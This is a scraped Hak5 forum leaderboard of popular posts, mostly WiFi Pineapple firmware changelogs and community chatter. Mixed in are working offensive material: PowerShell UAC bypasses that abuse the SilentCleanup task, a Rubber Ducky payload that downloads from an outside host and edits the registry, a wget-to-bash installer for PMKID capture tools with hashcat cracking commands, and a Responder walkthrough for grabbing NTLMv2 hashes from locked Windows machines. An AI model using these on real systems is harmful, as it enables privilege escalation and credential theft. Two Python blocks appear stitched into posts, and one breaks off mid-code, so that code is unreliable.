Leaderboard


Popular Content

Showing content with the highest reputation since 06/19/2018 in all areas

  1. 10 points
    Hey guys, I'm sincerely sorry for not making a formal announcement when the podcast went on hiatus a few weeks ago. I should have said something - but seeing as Hak5 has been in my life since the beginning - it was too hard to say that I was putting the show on hold. I've been going through a difficult time in my personal life (tl;dr: wedding is canceled) and I wasn't able to do the show the justice it deserves. That said, I'm resilient and new episodes will begin to air on January 2. We're also growing as a team, and we have amazing plans content, products, and community in 2019.
  2. 6 points
    Hi everyone, We just released firmware version 2.5.x for the WiFi Pineapple, vastly improving the PineAP engine. Expect greater results on your next wireless engagement with this release.
    Changelog 2.5.4:
      Recon
        Fixed an issue where scan times would be invalid in non-Chromium web browsers.
    Changelog 2.5.3:
      Clients
        Fixed an issue where SSIDs would not populate.
      Filters
        Add detailed Filters information.
      Setup
        Choosing the Filter modes is now required upon Setup.
      Recon
        Fixed an issue where, in some cases, probes would not be shown in the Recon dialog.
        Fixed an issue where some probes were not logged during a Recon scan.
        Fixed an issue where, in some cases, handshakes would not be captured.
        Fixed an issue where captured handshakes could not be downloaded if the capture had stopped.
        Fixed an issue where, in some cases, captured handshakes would have invalid frame lengths.
        Previous scan dates are now translated to the browser's local time.
        Fixed a rare issue where Live Scan results would not populate in the Web UI.
      PineAP
        Fixed an issue where downloading captured handshakes would not work.
    Changelog 2.5.2:
      Recon
        Fixed an issue where invalid results with BSSID 00:00:00:00:00:00 would be collected.
        Fixed an issue where changing the band to scan would not update until PineAP was restarted.
        Fixed a firewall issue preventing Live recon results from populating in the Web UI.
    Changelog 2.5.1:
      Misc
        Fix an issue where "Unsupported Device" would incorrectly show.
    Changelog 2.5.0:
      Hak5 Cloud C2
        Client Update
      PineAP
        Rewrite of PineAP, featuring a multitude of improvements and reliability fixes.
      Recon
        Improved reliability of scanning.
        Add throbber for deauth button.
        Automatically start scan after enabling PineAP.
        Remove misleading information message when the user started their first scan.
        Fixed a rare issue where multiple live Recon processes would start.
      Misc
        Reduce amount of Web UI HTTP requests.
        Fix missing paths on the WiFi Pineapple NANO.
    Download: Over the air via your WiFi Pineapple's web interface, or at https://downloads.hak5.org.
    ♥ - The Hak5 Development Team
  3. 6 points
    Hi everyone, We just launched the Hak5 Cloud C2! I just wanted to give everyone a heads up and give some basic instructions on how to get everything set up:
    Setting up the Hak5 Cloud C2 Server
    To set up the Hak5 Cloud C2 server, simply head over to https://c2.hak5.org, download either the community or professional edition, and wait for an email to arrive with the download link and licence key. Once you have downloaded the ZIP file containing the server, choose the correct version for your OS and architecture (such as linux 64bit), and execute the binary. You will be prompted to add some parameters such as '-hostname'. We recommend setting up the Hak5 Cloud C2 with DNS. Once running, you will have a setup token printed to your terminal. Make a note of that and head over to the configured IP / DNS and port using your favorite web browser (Firefox or Chrome(ium) are recommended). You will be guided through the setup there, and asked to enter your setup token and licence key. After performing the initial setup, if you need further help, click on the three dots in the top right corner and click on "Help".
    Update your device firmwares:
      WiFi Pineapple: Update your WiFi Pineapple NANO or TETRA to version 2.4.0 or above, via the web interface as you normally do.
      Packet Squirrel: Visit https://packetsquirrel.com/setup and follow the "Firmware Upgrades" instructions to install firmware version 2.0 or above.
      LAN Turtle: Update your LT, LT-SD, or LT-3G by using the "Check for updates" button inside of the turtle shell. Alternatively, follow the manual upgrade instructions from https://lanturtle.com/setup. You'll want to be on version 5 or above to have Cloud C2 support.
    Provisioning your devices:
    Once you have updated all of your Hak5 devices, you can go ahead and create new devices in the Hak5 Cloud C2 interface. After doing so, you'll be able to download the device.config files for each device by clicking the device from the list and then clicking the setup button from the device's menu. Once you have the config file, SCP it into the /etc/ folder on your device of choice and reboot the device. You should see it come online in the Hak5 Cloud C2 interface within a few minutes. Please remember that your devices will need to be networked to be able to reach the Hak5 Cloud C2 server (a mistake we made a lot during development).
    Introducing the Hak5 Cloud C2 video:
  4. 6 points
    PMKID Attack WPA/WPA2 on WiFi Pineapples! Pineapple NANO + TETRA
    WARNING! This attack is EXTREMELY effective on the Pineapples! And is capable of capturing an entire neighborhood of PMKIDs in a minute or less, no clients needed! ONLY use hcxdumptool on networks you have permission to, because of this:
      hcxdumptool is able to prevent complete wlan traffic!
      hcxdumptool is able to capture PMKIDs from access points (only one single PMKID from an access point required)
      hcxdumptool is able to capture handshakes from not connected clients (only one single M2 from the client is required)
      hcxdumptool is able to capture handshakes from 5GHz clients on 2.4GHz (only one single M2 from the client is required)
      hcxdumptool is able to capture extended EAPOL (RADIUS, GSM-SIM, WPS)
      hcxdumptool is able to capture passwords from the wlan traffic
      hcxdumptool is able to capture plain master-keys from the wlan traffic
      hcxdumptool is able to capture usernames and identities from the wlan traffic
    This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame. At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)!
    The main advantages of this attack are as follows:
      No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack)
      No more waiting for a complete 4-way handshake between the regular user and the AP
      No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
      No more eventual invalid passwords sent by the regular user
      No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
      No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
      No more special output format (pcap, hccapx, etc.) - final data will appear as a regular hex encoded string
    The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID.
    This attack is quite new, and gets updated regularly. I've compiled it for the Pineapples and uploaded it to GitHub. As the tools get updated often, I will have to update the packages often. So please check back for updates!
    Download: hcxtools (v4.2.1-16)
    Download: hcxdumptool (v4.2.1-17)
    Download and install both tools automatically by using this command on your Pineapple:
      wget -qO- https://raw.githubusercontent.com/adde88/hcxtools-hcxdumptool-openwrt/master/INSTALL.sh | bash -s -- -v -v
    Last update: 06.10.20618
    Changelog: Updated hcxdumptool to follow changes from upstream (@ZerBea)
    Install procedure: Download the IPKs to your Pineapple and install them using opkg. (If you're using the Nano, remember to install them to your SD card.)
    How do I use this? Choose an interface, and make sure it's not being used by anything else; let's use wlan1 in this example! (It will set the interface to monitor mode while working.)
      hcxdumptool -o test.pcapng -i wlan1 --enable_status 3
    This will use wlan1 to perform the attack and create a file named test.pcapng containing the PMKID. (You can try other options for --enable_status (1, 2, 4, 16?). Use --help for more info.) Filters can also be applied with --filterlist and --filtermode (again, read --help for details).
    You can then use hcxpcaptool to convert the PMKID to a hash readable by hashcat:
      hcxpcaptool -z test.16800 test.pcapng
    The next step would be to transfer test.16800 to a desktop capable of running the latest version of hashcat (version 4.2.0 or higher), and then run the attack, for example like this (this is NOT done on the Pineapple!!!):
      hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
    GitHub repos + source code:
      https://github.com/adde88/hcxtools-hcxdumptool-openwrt
      https://github.com/adde88/openwrt-useful-tools
    The first repo contains the IPK files and the SDK Makefiles needed to compile the project yourself. The second repo contains a lot of other useful tools I've compiled over time for the Pineapples, if you're interested in taking a peek. Donations are very helpful, and would help me contribute towards keeping all of these custom tools ported and up-to-date.
  5. 5 points
    Hi all - First off I want to thank everyone for providing feedback on this release. @Foxtrot will be following up shortly with an update that addresses an issue for those not being able to see probes. We've also come to understand that our filtering documentation has not been as explicit as it could be - so we've made an update to that module and the required configuration at the time of initial setup. The WiFi Pineapple filtering system limits the scope of engagement by filtering devices by MAC address and networks by name, in an Allow Mode of targeted devices or network names and a Deny Mode of off-limit devices or network names. Client filters specify which devices, by MAC address, are either explicitly allowed to connect or explicitly denied from connecting. In Allow Mode only the listed MAC addresses are allowed to connect. In Deny Mode, the listed MAC addresses will be prevented from connecting. SSID filters specify the network names to which the WiFi Pineapple will respond. In Allow Mode, devices will only be allowed to associate with the WiFi Pineapple for the SSID names listed. In Deny Mode, devices will be prevented from associating with the WiFi Pineapple for the listed SSID names. In the event that both filters are set to Deny Mode, you will be warned that all devices will be allowed to associate with the WiFi Pineapple for all requested SSID names. I hope this clears up any confusion and once again we appreciate all of the feedback and support.
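The Allow/Deny semantics described in this post, as an added example in Python (not Hak5 firmware code): the decision rules and the Deny+Deny warning are reconstructed from the prose above so an engagement scope can be checked before it is loaded onto a device. The `EngagementScope` class and the sample probe list are constructed for the example.

```python
"""Model of the WiFi Pineapple Allow/Deny filter semantics described above.

Added example, not Hak5 firmware code: the decision rules and the
'both filters in Deny mode' warning are reconstructed from the post's
prose so the scoping behaviour can be checked before an engagement.
"""
from dataclasses import dataclass

ALLOW = "allow"
DENY = "deny"


def normalise_mac(mac: str) -> str:
    """Canonical lower-case, colon-separated form so list entries compare reliably."""
    return mac.strip().lower().replace("-", ":")


@dataclass
class Filter:
    mode: str                                  # ALLOW or DENY
    entries: frozenset = frozenset()           # MACs or SSIDs, already normalised

    def permits(self, value: str) -> bool:
        if self.mode == ALLOW:
            return value in self.entries        # only listed values pass
        if self.mode == DENY:
            return value not in self.entries    # listed values are blocked
        raise ValueError(f"unknown filter mode {self.mode!r}")


@dataclass
class EngagementScope:
    client_filter: Filter     # keyed by MAC address
    ssid_filter: Filter       # keyed by network name (SSIDs are case-sensitive)

    @classmethod
    def build(cls, client_mode, client_macs, ssid_mode, ssids):
        return cls(Filter(client_mode, frozenset(normalise_mac(m) for m in client_macs)),
                   Filter(ssid_mode, frozenset(ssids)))

    def allows_association(self, client_mac: str, requested_ssid: str) -> bool:
        """A station associates only if both the client and the SSID filter permit it."""
        return (self.client_filter.permits(normalise_mac(client_mac))
                and self.ssid_filter.permits(requested_ssid))

    def warnings(self) -> list:
        """The setup-time warning from the post: Deny + Deny constrains nothing by default."""
        if self.client_filter.mode == DENY and self.ssid_filter.mode == DENY:
            return ["Both filters are in Deny mode: all devices not explicitly listed "
                    "will be allowed to associate for all requested SSID names."]
        return []

    def in_scope(self, observed):
        """Reduce a list of (mac, ssid) probe observations to those the scope permits."""
        return [(m, s) for m, s in observed if self.allows_association(m, s)]


if __name__ == "__main__":
    # Constructed sample observations, not a real capture.
    probes = [("AA-BB-CC-DD-EE-01", "CorpGuest"),
              ("aa:bb:cc:dd:ee:02", "CorpGuest"),
              ("aa:bb:cc:dd:ee:01", "NeighbourNet")]
    scope = EngagementScope.build(ALLOW, ["aa:bb:cc:dd:ee:01"], ALLOW, ["CorpGuest"])
    print(scope.in_scope(probes))        # only the first probe is in scope
    print(EngagementScope.build(DENY, [], DENY, []).warnings())
```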
  6. 5 points
  7. 5 points
    Hi all. I'm just now becoming aware of multiple related situations identified in this thread. I sympathize as no one should be waiting this long on their orders, and I offer my sincerest apologies. Looking deeper into the various issues it seems that most are related to a hazmat shipping situation that has prevented us from selling batteries outside of very limited circumstances (domestic ground shipments only). Unfortunately our logistics provider has been extremely slow to respond in rectifying the situation. For example, some international shipments sent by DHL had been shipped back then repackaged via FedEx. It's extremely frustrating to have high value orders containing multiple units get to the border and be delayed by days if not weeks and incur immense shipping expenses due to one unit. We have since removed all batteries from kits until a better logistics solution can be found. We are also investigating alternative logistics providers to alleviate these response delays. I'm terribly saddened that our plan to use a professional logistics outfit for fulfillment of orders at higher speeds than possible by the small team that is Hak5 has resulted in the exact opposite in these edge cases. It's absolutely unacceptable and I share in your frustration. Furthermore, our support systems have not been adequate to deal with these logistics challenges in a timely manner, and for that I offer my sincere apologies. We are back from defcon, we hear you, and while half of us are hard at work on the next big thing - the rest of the team is dedicated to digging into each and every support ticket to ensure that you receive exactly what you are due. You will have resolution by the end of the week.
  8. 4 points
    Hi everyone, In an effort to lower the barrier to entry of writing Ducky Scripts even more, our newest addition to the development team @dallaswinger has created a totally self-contained HTML file which acts as a Ducky Script encoder. In addition to supporting all currently available commands of the original Java-based Duckencoder, this new version also supports different keyboard layouts in the form of the Bash Bunny language files. We will be adding more features to this encoder soon, and are especially looking forward to your feedback. Please leave all suggestions or bug reports in this thread. The jsencoder.html file can be found attached to this post and should be considered to be in beta. If it drinks your coffee, eats your pets, or starts an intergalactic war, please blame @dallaswinger. Note: You currently need an internet connection to load the bootstrap CSS and jQuery JS files. As this is not the final release, we have forgone including them inside of the HTML. jsencoder.html
  9. 4 points
    I'm sure everyone at some point in their life has unplugged something from a Windows machine and heard the notification sound. This is obviously way too robotic and lifeless for my taste; here is a ducky payload that will replace device disconnect sounds with a scream. Just in case you want it to feel like a living thing that is suffering as you rip parts off of it. Inspiration from watching too much Michael Reeves.
    Requires internet access on the target Windows host; this is just the shortest/fastest way to drop this kind of payload. Other staging/injection techniques could be used to supplement the download. This will open Run and execute the .wav download and registry changes in the background. Give it a couple of seconds to download. The change should be made by the time you remove the ducky from the target.
      DELAY 3000
      GUI r
      DELAY 350
      STRING cmd /C "start /MIN cmd /C bitsadmin.exe /transfer 'e' http://h4k.cc/s.wav %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f"
      ENTER
    This downloads a sample .wav (Doom). Replace the above URL with another that hosts the desired .wav if you want to change the sound. Fastest way to encode this would be using our single file JS Duck Encoder: https://downloads.hak5.org/ducky
  10. 4 points
    It is a DC Type-M Barrel (OD:5.50mm, ID: 2.10mm, Center +).
  11. 4 points
    Move out and get a different flat with better room mates.
  12. 4 points
    ♥ - The Hak5 Development Team
    Changelog 2.2.0
      General
        Fixed an issue where the device LED did not stay illuminated after boot had finished.
      PineAP
        PineAP can now imitate enterprise access points, and capture enterprise client credentials. Credentials are displayed in the UI, under the new "PineAP Enterprise" panel. The credential hashes may be exported in either h$
        When association passthrough is enabled, clients may associate to the enterprise access point (depending on vendor implementati$
      Recon
        Added the ability to clone an enterprise access point for use with PineAP Enterprise. The clone option can be used via the new encryption dialog, which is accessed via the button in Recon scan results for access p$
      Configuration
        Fixed an issue where factory reset would not work on the TETRA.
      Clients
        Enterprise clients are now displayed in the clients list.
        Fixed an issue where client SSID would always be unavailable.
      Networking
        Fixed an issue where the wrong interface may be incorrectly selected under client mode.
    Download: Over the air, or manually from https://wifipineapple.com/downloads
  13. 4 points
    One thing to help with all the other things. Ducky and bunny integration will be really cool. Great job guys!!!
  14. 4 points
    I'd burn it all down and move house, sounds like they've got you well and truly in their grasp and are unlikely to let go. With pin hole cameras there could be one in every nail and screw head in your apartment and you'd never know unless the doors fell off the cupboards because they used cameras instead of nails, that might give it away. I'd also stay off the Raspberry Pi, did you know that if you sum up the ASCII values of all the letters in the name you get 745 which is the year Kulun Beg died and I think we all know what that means.
  15. 4 points
    Hi everyone, After releasing firmware version 2.3.0 at DEF CON, I hadn't gotten around to creating a forum thread for it yet. As usual, please leave all feedback in this thread. ♥ - The Hak5 Development Team
    Changelog 2.3.1:
      Recon
        Fixed an issue where timed recon scans would fail the first time around.
        Fixed an issue where the stop handshake capture button would persist after a capture had completed.
    Changelog 2.3.2:
      Recon
        Fixed an issue where performing recon scans would lock up all further PineAP actions.
    Changelog 2.3.0:
      Recon
        Added the ability to capture WPA Handshakes by clicking on the arrow next to a WPA / WPA2 encrypted network.
        Fixed an issue where multicast MAC addresses were shown as clients to wireless networks.
      PineAP
        Fixed an issue where PineAP would remain running when the wlan1mon interface had been removed, causing confusion.
      Filters
        Fixed an issue where some combinations of filters did not apply correctly.
      Logging
        Fixed an issue where non-completed associations were logged as completed.
      General
        Fixed an issue where notifications would show invalid timestamps in Firefox.
        Fixed an issue that prevented the timezone set during initial Setup from persisting across reboots.
    Download: Over the air via your WiFi Pineapple's web interface, or at https://wifipineapple.com/downloads
  16. 3 points
    Hi everyone! Inspired by the "Making Windows scream when you unplug devices" payload, I was thinking of other fun payloads you can do with the Rubber Ducky. Lately, a co-worker of mine showed me how you can play music with powershell and after I've seen that, I just had to make a payload with this feature. For those who aren't aware, you can use "beep" commands with powershell which will, when executed, play a tone. If you want to try it yourself, just open powershell and execute the following command:
      [console]::beep(500,300)
    When executed, you will hear a short "beep". You can find further information on the powershell beep command here: https://devblogs.microsoft.com/scripting/powertip-use-powershell-to-send-beep-to-console/ So now we can make our own music using powershell. Luckily, there are already some tracks available such as "The Imperial March (Star Wars)" or "Mission Impossible". When I saw this, I just had to make a Rubber Ducky payload out of this. So every time you plug in the Rubber Ducky, it will execute the powershell script and play the Star Wars Imperial March.
    Here is the payload:
      DELAY 3000
      GUI r
      DELAY 250
      STRING powershell
      DELAY 250
      ENTER
      DELAY 500
      REM Hide the powershell window
      STRING Add-Type -Name W -Names C -M '
      ENTER
      STRING [DllImport("Kernel32.dll")]
      ENTER
      STRING public static extern IntPtr GetConsoleWindow();
      ENTER
      STRING [DllImport("user32.dll")]
      ENTER
      STRING public static extern bool MoveWindow(IntPtr h, int X, int Y, int W, int H);'
      ENTER
      STRING [C.W]::MoveWindow([C.W]::GetConsoleWindow(),0,0,-1,-1);
      ENTER
      REM Play the Imperial March
      STRING [console]::beep(440,500);[console]::beep(440,500);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(698,350);[console]::beep(523,150);[console]::beep(415,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);exit
      ENTER
    Of course one should be able to loop this so the song will keep playing, but I'll leave that up to you guys 🙂 I know it's a kinda meaningless but fun payload, so I hope some of you will enjoy it! - zSec
  17. 3 points
    Hi! We just released 2.5.4, which on top of 2.5.3, addresses a few issues that have been reported since the launch of 2.5.2 (thank you!). Catch the change log in the first post and upgrade via the WiFi Pineapple OTA or via the Download Center.
  18. 3 points
    Good luck with that. We're not going to help you hack your girlfriend's iPhone.
  19. 3 points
    function sudo {
        $command = "powershell -noexit " + $args + ";#"
        Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value $command
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir"
    }
    Quick function that works like sudo 🙂
  20. 3 points
    Here you go, new version. @Darren Kitchen @lokiuox https://github.com/PoSHMagiC0de/Invoke-TaskCleanerBypass It uses dynamic parameters and can take in the standard posh base64 encoded commands or a file location of your script. As far as the bypass thing. Just run it as an encoded command. Better yet, here is a good way to launch it. 😛 Just create an encoded stager to downloadstring the bypass script from a web server and execute it with "Invoke-Expression" (IEX for short) with the command. You probably can take this function, add after it the command to run it with your parameters and encode the whole thing to run. No bypass to execution policy needed. Anyway, look at the script. Some modifications were needed to the reg hack. I needed to use cmd /c in front so I could escape the appended stuff that gets added when run like the cleaner command. That was breaking the exploit. So the new reg entry is cmd /c yourpayload & :: That runs the command and then rems out whatever else is there. SQL injection for registries. 😛 Since I won the competition this month I am not payloading this. Someone else can run with this and create a BB payload. I know a few ways to use it but someone else can have a turn. FYI: It checks if you have Win10, member of local admins and already UAC bypassed. Will run if bypassed, will do nothing if not on 10 or greater and/or not a local admin.
  21. 3 points
    I found this the other day and thought if some of you haven't seen it, you might find it interesting. I have yet to test it myself but plan to soon. Hashcat PMKID
  22. 3 points
    After much chagrin and googling, we found that QuickCreds will not work on the LAN Turtle because of disk space issues. Here's our fix! (We take no responsibility if you break something/somebody. Only hack when you have prior approval and authorization!)
    Factory reset, or push the turtle-5.bin firmware to reset (probably need to upgrade to v5 anyway). This makes sure you are set to base. YMMV.
      Open the LAN Turtle, push and hold the reset button for at least 5 seconds after plugging it into the machine
      ssh in to 172.16.84.1, sh3llz, change password
      Update the modules list
      Only install QuickCreds for now, so we have enough space
      Select QuickCreds and configure
      Let it install its dependencies
      You can now set QuickCreds to 'Enable' so that it will start at boot
      DO NOT REBOOT YET!
    At this point, we're going to exit and git clone the Responder package. DO NOT INSTALL RESPONDER FROM THE TURTLE MODULES LIST ITSELF.
      Exit 'turtle' back to a basic root shell
      Git clone the Responder package first to /tmp since there is plenty of space:
        git clone git://github.com/lgandx/Responder /tmp/Responder
      BUT DON'T REBOOT YET, CAUSE YOU'LL LOSE EVERYTHING IN /tmp
        du -sh /tmp/Responder
        3.8M
        rm -rf /tmp/Responder/.git
        rm -rf /tmp/Responder/tools/MultiRelay/
        du -sh /tmp/Responder
        450.5k
    We also want to remove the git package as it takes up >1MB of space. QuickCreds installs it /only/ to git the Responder package 😕
        opkg remove git
        df -h
        1.2M available on /
    Move the Responder package back to /etc/turtle/ for QuickCreds to find it:
        mv /tmp/Responder/ /etc/turtle/
        df -h
        1.1M still available on / now (w00t)
    The QuickCreds module is hardcoded to use br-lan as the interface. This doesn't exist, so we need to change it to eth0. Another 😕
        sed -i 's/br-lan/eth0/' /etc/turtle/modules/QuickCreds
    You should now have at least 1MB of storage on / and plenty of space for /root/loot to write to, as well as have Responder available for QuickCreds.
    Pop the turtle in a Windows system and wait about 30 seconds until the amber light goes solid, CREDS!!!
    Copy and paste the hash from /root/loot/#/HTTP-NTLMv2-172.16.84.127.txt
    Paste into a hash file and send it to john with a wordlist:
        john hash.txt --wordlist=wordlist.txt
    Testing shows this works whether the laptop is locked or not locked. These hashes can not be replayed, only cracked. You still have plenty of space to return to the turtle shell and install any other modules you need at this point. You may need git for something else, but probably not enough space. This set up is for the "Grab creds from a locked Workstation" scenario. You may need MultiRelay for something else...? Not needed for QuickCreds. ENJOY!
  23. 3 points
    It would be awesome if I could manage my wifi pineapples modules/payloads from cloud C2. Obviously this would be true of the other supported devices as well.
  24. 3 points
    This isn't quite right. Blue text for MAC addresses is an indicator that the MAC may be randomised by the discovered device. You can see more detail if you hover over that text. Out of Range clients are stations that your Pineapple has seen previously but is now no longer seeing any probes for.
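The two Recon indicators explained in this reply (randomised-MAC hint, Out of Range clients), plus the multicast-as-client bug the 2.3.0 changelog above mentions, as an added Python example that is not WiFi Pineapple firmware code. The randomised hint here is the IEEE locally-administered bit, which OS MAC randomisation sets; the 300-second out-of-range window and the `ReconClients` class are assumptions, since the post does not give the firmware's rules.

```python
"""Interpretation of Recon client indicators, as an added example (not
WiFi Pineapple firmware code): a 'randomised MAC' hint from the IEEE
locally-administered bit, an 'out of range' flag for stations whose last
probe is older than a window, and a multicast check for addresses that
can never be a real station. OUT_OF_RANGE_AFTER is an assumption; the
firmware's real threshold is not given in the post.
"""
from datetime import datetime, timedelta

OUT_OF_RANGE_AFTER = timedelta(seconds=300)   # assumption, not the firmware's value


def first_octet(mac: str) -> int:
    return int(mac.strip().replace("-", ":").split(":")[0], 16)


def is_locally_administered(mac: str) -> bool:
    """Bit 1 of the first octet (0x02) marks a locally administered address; OS
    MAC randomisation sets it, so it is the usual hint that a MAC is not burned-in."""
    return bool(first_octet(mac) & 0x02)


def is_multicast(mac: str) -> bool:
    """Bit 0 of the first octet (0x01); a multicast address can never be a station."""
    return bool(first_octet(mac) & 0x01)


class ReconClients:
    """Tracks the last probe seen from each station and classifies them."""

    def __init__(self):
        self.last_seen = {}

    def observe_probe(self, mac: str, at: datetime) -> bool:
        """Record a probe; returns False (and ignores it) for multicast sources."""
        if is_multicast(mac):
            return False
        key = mac.strip().lower().replace("-", ":")
        if key not in self.last_seen or at > self.last_seen[key]:
            self.last_seen[key] = at
        return True

    def report(self, now: datetime):
        """Per-station view: randomised hint and whether probes have gone quiet."""
        return {mac: {"randomised_hint": is_locally_administered(mac),
                      "out_of_range": now - seen > OUT_OF_RANGE_AFTER}
                for mac, seen in self.last_seen.items()}


def demo_report():
    """Constructed probe observations (not a real scan) run through the model."""
    t0 = datetime(2018, 12, 20, 10, 0, 0)
    r = ReconClients()
    r.observe_probe("00:11:22:33:44:55", t0)                         # quiet for 10 min
    r.observe_probe("da:a1:19:00:00:01", t0 + timedelta(minutes=9))  # recent, randomised
    r.observe_probe("01:00:5e:00:00:fb", t0)                         # multicast: dropped
    return r.report(t0 + timedelta(minutes=10))


if __name__ == "__main__":
    for mac, flags in demo_report().items():
        print(mac, flags)
```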
  25. 3 points
    Best idea, get someone in who knows what they are doing. If you are having to ask on a forum about how to conduct a pen test, especially one that has anything to do with ebanking, then you really shouldn't be doing it. I know this sounds harsh and everyone has to learn, but this is not the environment to learn in, you mess up here and you could leave the company open to attack despite your report saying they are secure. I'd find someone who knows what they are doing, get them to do the job, and shadow them to learn from them. Do this a few times and then start to take a more active role with the second person watching what you are doing. It will take a while but you'll get to the point where you can do a test that will give the client what they actually need.
  26. 3 points
    Hi, did you purchase the tactical edition? If so, those antennas are designed to be that way when you put it into the pouch.
  27. 3 points
    Yes, no, possibly and maybe. Yes, it will protect at least some of your network traffic as it goes from your device through to the FastestVPN server, at that point, the server decrypts the traffic and sends it on its way. That is what is meant by between the end points, you to them, what happens from them onwards depends on the type of traffic you are sending. This should at least get your traffic through the Chinese firewall. No, the Chinese have some very strict rules in place and may block the VPN or mess with the traffic in order to be able to decrypt what they see, for example swapping out encryption certificates. When doing this, if the client has been written correctly, it should warn you that something bad is happening so you will be able to make a decision as to what to do. Possibly, without knowing something about how FastestVPN works, it isn't possible to say how well they configure the service, done well and all your traffic should go across the VPN, done badly and all sorts could leak out around it. Maybe, without fully testing it in an environment where you can monitor exactly what is going on then it isn't possible to know for sure. Something to remember, if you are using public wifi and they have a captive portal (a web login page), then you'll probably need to have the VPN off to reach it meaning all your traffic is flowing in the clear till you've logged in. Also consider "Evil Maid" attacks and general surveillance. A VPN is good, but a camera pointed at your screen watching everything you do will defeat the protections to a degree.
  28. 3 points
    Starting to think we need a creative writing section on the forums...
  29. 3 points
    Hi, Here is the solution; The problem is there is a file missing, because of that the procps service cannot be started. Here is how to fix it:
      cp /lib/systemd/system/bak/systemd-sysctl.service /lib/systemd/system
      ln -s /lib/systemd/system/procps.service /etc/systemd/system/procps.service
    Now you are good to go...
  30. 3 points
    Sorry, buddy. No one here is going to help you hack into your dad's router just so you can play games or watch videos without doing your chores. We all need to do our chores, otherwise bad things happen.
  31. 3 points
    If your boss won't listen to "it's illegal" tell him "it's not possible", he can't force you to do it if you don't know how. If it's your fair, you set the rules ban any recording devices.
  33. 3 points
    Or......... Don't make things that are malicious in nature.
  34. 3 points
    We were all there actually. You'll see us for a split second. We got to set up our entire defcon booth for the movie.
  35. 3 points
    Hi everyone, We have just released firmware v2.1.1 with a whole bunch of bugfixes. Please see the first post of this thread for more details.
  36. 2 points
    Hi friends, I don't have time for this yet. I will fix the bug as soon as I can.
  37. 2 points
    ## Use powershell -ep bypass .\script.ps1 to launch ##
    ## Fixed an issue where there are spaces in the script path. ##
    ## Added option for interactive window, comment out the code to change back to hidden ##
    ## Current example below opens an Admin powershell window ##
    if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
        #Payload goes here
        #It'll run as Administrator
        powershell.exe
    } else {
        $registryPath = "HKCU:\Environment"
        $Name = "windir"
        #Use for hidden window
        #$Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
        #Use for interactive window
        $Value = "powershell -ExecutionPolicy bypass -Command `"& `'$PSCommandPath`'`";#"
        Set-ItemProperty -Path $registryPath -Name $Name -Value $Value
        #Depending on the performance of the machine, some sleep time may be required before or after schtasks
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
        Remove-ItemProperty -Path $registryPath -Name $Name
    }
    Fixed an issue with spaces in the script path.
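The posts above (the `sudo` function, Invoke-TaskCleanerBypass and this script) all set a per-user `windir` under HKCU:\Environment and then run the SilentCleanup scheduled task. From the defender's side, that sequence is what to look for; as an added example, not code from any of the posts, here is detection logic over constructed Sysmon-style events (Event ID 13 registry value set, Event ID 1 process create). Field names follow Sysmon's schema; `SAMPLE_EVENTS`, the SID and the paths are constructed, not captured telemetry.

```python
"""Detection of the SilentCleanup / per-user 'windir' technique used by the
posted scripts. Added example: correlates Sysmon-style events (Event ID 13
registry value set, Event ID 1 process create) and rates a user-hive 'windir'
override by what follows it. Every record in SAMPLE_EVENTS is constructed.
"""
import re
from datetime import datetime, timedelta

SILENTCLEANUP = re.compile(r"schtasks(\.exe)?\s+/run\b.*SilentCleanup", re.I)
# The posted payloads end the value with ';#' or '& ::' to comment out what the
# task appends to it, so a terminator like that is an extra indicator.
COMMENT_TERMINATORS = (";#", "& ::", "&::")

# Constructed Sysmon-like records (not real logs).
SAMPLE_EVENTS = [
    {"time": "2018-12-20T10:00:01", "id": 13,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\windir",
     "Details": "powershell -noexit whoami;#"},
    {"time": "2018-12-20T10:00:02", "id": 1,
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I"},
    {"time": "2018-12-20T11:30:00", "id": 13,
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\TEMP",
     "Details": r"C:\Users\alice\AppData\Local\Temp"},   # benign user variable
]


def is_user_windir(target_object: str) -> bool:
    """windir normally comes only from the machine-wide environment; a copy in a
    user hive (HKU\\<SID>\\Environment or HKCU) shadows it for that user's tasks."""
    t = target_object.lower()
    return t.startswith(("hku\\", "hkcu\\")) and t.endswith("\\environment\\windir")


def _ts(e):
    return datetime.fromisoformat(e["time"])


def detect(events, window_seconds=60):
    """Return one alert per user-hive windir override: 'high' when a SilentCleanup
    task launch follows within the window, otherwise 'medium'."""
    alerts = []
    ordered = sorted(events, key=_ts)
    for i, e in enumerate(ordered):
        if e["id"] != 13 or not is_user_windir(e.get("TargetObject", "")):
            continue
        deadline = _ts(e) + timedelta(seconds=window_seconds)
        launches = [f for f in ordered[i + 1:]
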